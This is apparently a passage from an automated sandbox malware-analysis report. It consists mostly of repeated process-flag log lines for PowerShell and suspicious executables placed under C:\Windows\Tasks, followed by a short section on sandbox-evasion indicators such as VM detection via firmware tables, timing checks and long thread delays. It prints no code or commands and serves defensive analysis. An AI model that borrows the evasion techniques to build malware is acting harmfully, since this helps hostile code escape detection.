                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\migrate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\Superfetch.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\1.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Query firmware table information (likely to detect VMs)
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSystem information queried: FirmwareTableInformation
                                  Source: C:\Windows\Bridgeprovider.exeMemory allocated: 1770000 memory reserve | memory write watch
                                  Source: C:\Windows\Bridgeprovider.exeMemory allocated: 1B3F0000 memory reserve | memory write watch
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0063AC rdtsc 62_2_00007FFDFB0063AC
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapFree,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,31_2_000000014000EE50
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: EnumServicesStatusExW,GetLastError,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,31_2_0000000140011A80
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapFree,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,37_2_000000014000EE50
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: EnumServicesStatusExW,GetLastError,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,37_2_0000000140011A80
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\Bridgeprovider.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7630Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2045Jump to behavior
